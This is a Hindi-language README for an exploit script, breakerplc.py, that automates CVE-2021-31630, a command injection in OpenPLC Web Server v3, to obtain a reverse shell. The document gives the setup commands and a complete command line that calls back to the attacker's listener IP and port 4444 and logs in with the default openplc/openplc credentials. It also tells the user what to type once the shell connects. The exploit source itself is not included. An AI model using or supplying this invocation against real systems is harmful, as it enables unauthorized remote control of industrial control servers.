
यह cve-2021-31630 के शोषण का एक स्वचालन है
यह स्क्रिप्ट OpenPLC Web Server v3 में भेद्यता का स्वचालित रूप से शोषण करती है।
आप मैन्युअल तकनीकों का उपयोग किए बिना सर्वर के साथ एक स्वचालित रिवर्स शेल बना सकेंगे।
CVE-2021-31630 विवरण Open PLC Webserver v3 में कमांड इंजेक्शन दूरस्थ हमलावरों को एप्लिकेशन के "/hardware" पृष्ठ पर "Hardware Layer Code Box" घटक के माध्यम से मनमाना कोड निष्पादित करने की अनुमति देता है।
स्क्रिप्ट को अनुकूलित किया गया था ताकि OpenPLC में स्क्रिप्ट पंजीकरण पूरा करने के बाद, यह उसी टर्मिनल में मशीन का शेल उत्पन्न करे।
नीचे दिए गए कमांड का उपयोग करें (निर्भरताएँ स्थापित करने के लिए हम Python वर्चुअल वातावरण बनाने की सलाह देते हैं) # हालांकि, breakerplc.py स्क्रिप्ट को वर्चुअल वातावरण के बाहर निष्पादित किया जाना चाहिए।
sudo apt update
pip3 install requests
इसका उपयोग कैसे करें? आप नीचे दी गई कमांड लाइन का उपयोग कर सकते हैं।
python breakerplc.py -lh <your local ip> -lp 4444 <http://machine ip:8080> -u openplc -p openplc
usage: python breakerplc.py [-h] [-u U] [-p P] [-t T] -lh LH -lp LP url
positional arguments:
url Target URL with http(s)://
options:
-h, --help show this help message and exit
-u U Username
-p P Password
-t T Request Timeout, increase if server is slow
-lh LH LHOST
-lp LP LPORT

महत्वपूर्ण
कनेक्ट करने के बाद, आपको कोड की लाइन तोड़ने और शेल वापस पाने के लिए "whoami" या "ls" लिखना होगा।
